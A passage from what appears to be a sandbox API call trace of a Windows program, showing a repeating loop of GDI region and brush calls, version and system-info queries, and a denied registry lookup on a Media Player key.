y1=0, x2=0, y2=0) returned 0x1040fdb [0088.183] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fdc [0088.183] CombineRgn (hrgnDst=0x1040fdb, hrgnSrc1=0x290401d6, hrgnSrc2=0x2b0401d3, iMode=1) returned 1 [0088.183] CombineRgn (hrgnDst=0x1040fdc, hrgnSrc1=0x290401d6, hrgnSrc2=0x2b0401d3, iMode=4) returned 2 [0088.183] CreateSolidBrush (color=0xff) returned 0x2100fda [0088.183] CreateSolidBrush (color=0xff0000) returned 0x1100fdd [0088.183] DeleteObject (ho=0x1100fdd) returned 1 [0088.183] DeleteObject (ho=0x2b0401d3) returned 1 [0088.183] DeleteObject (ho=0x290401d6) returned 1 [0088.183] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.183] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.183] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.183] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.183] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.183] BeginPath (hdc=0x0) returned 0 [0088.183] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.183] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.183] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.183] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.183] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.183] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.184] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.184] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.184] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2c0401d3 [0088.184] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2a0401d6 [0088.184] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fde [0088.184] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fdf [0088.184] CombineRgn (hrgnDst=0x1040fde, hrgnSrc1=0x2c0401d3, hrgnSrc2=0x2a0401d6, iMode=1) returned 1 [0088.184] CombineRgn (hrgnDst=0x1040fdf, hrgnSrc1=0x2c0401d3, hrgnSrc2=0x2a0401d6, iMode=4) returned 2 [0088.184] CreateSolidBrush (color=0xff) returned 0x2100fdd [0088.184] CreateSolidBrush (color=0xff0000) returned 0x1100fe0 [0088.184] DeleteObject (ho=0x1100fe0) returned 1 [0088.184] DeleteObject (ho=0x2a0401d6) returned 1 [0088.184] DeleteObject (ho=0x2c0401d3) returned 1 [0088.184] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.184] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.184] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.184] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.184] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.184] BeginPath (hdc=0x0) returned 0 [0088.184] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.184] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.184] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.184] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.184] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.184] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.184] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.184] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.184] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2b0401d6 [0088.184] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2d0401d3 [0088.184] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fe1 [0088.184] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fe2 [0088.184] CombineRgn (hrgnDst=0x1040fe1, hrgnSrc1=0x2b0401d6, hrgnSrc2=0x2d0401d3, iMode=1) returned 1 [0088.184] CombineRgn (hrgnDst=0x1040fe2, hrgnSrc1=0x2b0401d6, hrgnSrc2=0x2d0401d3, iMode=4) returned 2 [0088.184] CreateSolidBrush (color=0xff) returned 0x2100fe0 [0088.184] CreateSolidBrush (color=0xff0000) returned 0x1100fe3 [0088.184] DeleteObject (ho=0x1100fe3) returned 1 [0088.184] DeleteObject (ho=0x2d0401d3) returned 1 [0088.184] DeleteObject (ho=0x2b0401d6) returned 1 [0088.184] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.185] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.185] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.185] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.185] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.185] BeginPath (hdc=0x0) returned 0 [0088.185] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.185] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.185] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.185] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.185] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.185] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.185] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.185] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.185] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2e0401d3 [0088.185] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2c0401d6 [0088.185] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fe4 [0088.185] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fe5 [0088.185] CombineRgn (hrgnDst=0x1040fe4, hrgnSrc1=0x2e0401d3, hrgnSrc2=0x2c0401d6, iMode=1) returned 1 [0088.185] CombineRgn (hrgnDst=0x1040fe5, hrgnSrc1=0x2e0401d3, hrgnSrc2=0x2c0401d6, iMode=4) returned 2 [0088.185] CreateSolidBrush (color=0xff) returned 0x2100fe3 [0088.185] CreateSolidBrush (color=0xff0000) returned 0x1100fe6 [0088.185] DeleteObject (ho=0x1100fe6) returned 1 [0088.185] DeleteObject (ho=0x2c0401d6) returned 1 [0088.185] DeleteObject (ho=0x2e0401d3) returned 1 [0088.185] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.185] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.185] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.185] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.185] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.185] BeginPath (hdc=0x0) returned 0 [0088.185] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.185] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.185] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.185] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.185] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.185] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.185] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.185] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.186] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2d0401d6 [0088.186] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2f0401d3 [0088.186] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fe7 [0088.186] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fe8 [0088.186] CombineRgn (hrgnDst=0x1040fe7, hrgnSrc1=0x2d0401d6, hrgnSrc2=0x2f0401d3, iMode=1) returned 1 [0088.186] CombineRgn (hrgnDst=0x1040fe8, hrgnSrc1=0x2d0401d6, hrgnSrc2=0x2f0401d3, iMode=4) returned 2 [0088.186] CreateSolidBrush (color=0xff) returned 0x2100fe6 [0088.186] CreateSolidBrush (color=0xff0000) returned 0x1100fe9 [0088.186] DeleteObject (ho=0x1100fe9) returned 1 [0088.186] DeleteObject (ho=0x2f0401d3) returned 1 [0088.186] DeleteObject (ho=0x2d0401d6) returned 1 [0088.186] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.186] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.186] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.186] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.186] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.186] BeginPath (hdc=0x0) returned 0 [0088.186] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.186] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.186] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.186] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.186] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.186] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.186] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.186] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.186] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x300401d3 [0088.186] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2e0401d6 [0088.186] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fea [0088.186] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040feb [0088.186] CombineRgn (hrgnDst=0x1040fea, hrgnSrc1=0x300401d3, hrgnSrc2=0x2e0401d6, iMode=1) returned 1 [0088.186] CombineRgn (hrgnDst=0x1040feb, hrgnSrc1=0x300401d3, hrgnSrc2=0x2e0401d6, iMode=4) returned 2 [0088.186] CreateSolidBrush (color=0xff) returned 0x2100fe9 [0088.186] CreateSolidBrush (color=0xff0000) returned 0x1100fec [0088.186] DeleteObject (ho=0x1100fec) returned 1 [0088.186] DeleteObject (ho=0x2e0401d6) returned 1 [0088.186] DeleteObject (ho=0x300401d3) returned 1 [0088.186] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.186] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.186] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.187] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.187] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.187] BeginPath (hdc=0x0) returned 0 [0088.187] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.187] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.187] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.187] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.187] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.187] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.187] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.187] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.187] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2f0401d6 [0088.187] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x310401d3 [0088.187] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fed [0088.187] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fee [0088.187] CombineRgn (hrgnDst=0x1040fed, hrgnSrc1=0x2f0401d6, hrgnSrc2=0x310401d3, iMode=1) returned 1 [0088.187] CombineRgn (hrgnDst=0x1040fee, hrgnSrc1=0x2f0401d6, hrgnSrc2=0x310401d3, iMode=4) returned 2 [0088.187] CreateSolidBrush (color=0xff) returned 0x2100fec [0088.187] CreateSolidBrush (color=0xff0000) returned 0x1100fef [0088.187] DeleteObject (ho=0x1100fef) returned 1 [0088.187] DeleteObject (ho=0x310401d3) returned 1 [0088.187] DeleteObject (ho=0x2f0401d6) returned 1 [0088.187] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.187] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.187] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.187] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.187] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.187] BeginPath (hdc=0x0) returned 0 [0088.187] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.187] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.187] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.187] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.187] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.187] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.187] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.187] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.187] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x320401d3 [0088.187] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x300401d6 [0088.187] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ff0 [0088.188] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ff1 [0088.188] CombineRgn (hrgnDst=0x1040ff0, hrgnSrc1=0x320401d3, hrgnSrc2=0x300401d6, iMode=1) returned 1 [0088.188] CombineRgn (hrgnDst=0x1040ff1, hrgnSrc1=0x320401d3, hrgnSrc2=0x300401d6, iMode=4) returned 2 [0088.188] CreateSolidBrush (color=0xff) returned 0x2100fef [0088.188] CreateSolidBrush (color=0xff0000) returned 0x1100ff2 [0088.188] DeleteObject (ho=0x1100ff2) returned 1 [0088.188] DeleteObject (ho=0x300401d6) returned 1 [0088.188] DeleteObject (ho=0x320401d3) returned 1 [0088.188] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.188] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.188] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.188] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.188] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.188] BeginPath (hdc=0x0) returned 0 [0088.188] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.188] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.188] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.188] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.188] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.188] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.188] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.188] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.188] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x310401d6 [0088.188] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x330401d3 [0088.188] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ff3 [0088.188] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ff4 [0088.188] CombineRgn (hrgnDst=0x1040ff3, hrgnSrc1=0x310401d6, hrgnSrc2=0x330401d3, iMode=1) returned 1 [0088.188] CombineRgn (hrgnDst=0x1040ff4, hrgnSrc1=0x310401d6, hrgnSrc2=0x330401d3, iMode=4) returned 2 [0088.188] CreateSolidBrush (color=0xff) returned 0x2100ff2 [0088.188] CreateSolidBrush (color=0xff0000) returned 0x1100ff5 [0088.188] DeleteObject (ho=0x1100ff5) returned 1 [0088.188] DeleteObject (ho=0x330401d3) returned 1 [0088.188] DeleteObject (ho=0x310401d6) returned 1 [0088.188] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.188] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.188] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.188] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.188] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.188] BeginPath (hdc=0x0) returned 0 [0088.188] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.188] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.188] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.189] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.189] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.189] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.189] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.189] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.189] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x340401d3 [0088.189] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x320401d6 [0088.189] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ff6 [0088.189] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ff7 [0088.189] CombineRgn (hrgnDst=0x1040ff6, hrgnSrc1=0x340401d3, hrgnSrc2=0x320401d6, iMode=1) returned 1 [0088.189] CombineRgn (hrgnDst=0x1040ff7, hrgnSrc1=0x340401d3, hrgnSrc2=0x320401d6, iMode=4) returned 2 [0088.189] CreateSolidBrush (color=0xff) returned 0x2100ff5 [0088.189] CreateSolidBrush (color=0xff0000) returned 0x1100ff8 [0088.189] DeleteObject (ho=0x1100ff8) returned 1 [0088.189] DeleteObject (ho=0x320401d6) returned 1 [0088.189] DeleteObject (ho=0x340401d3) returned 1 [0088.189] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: 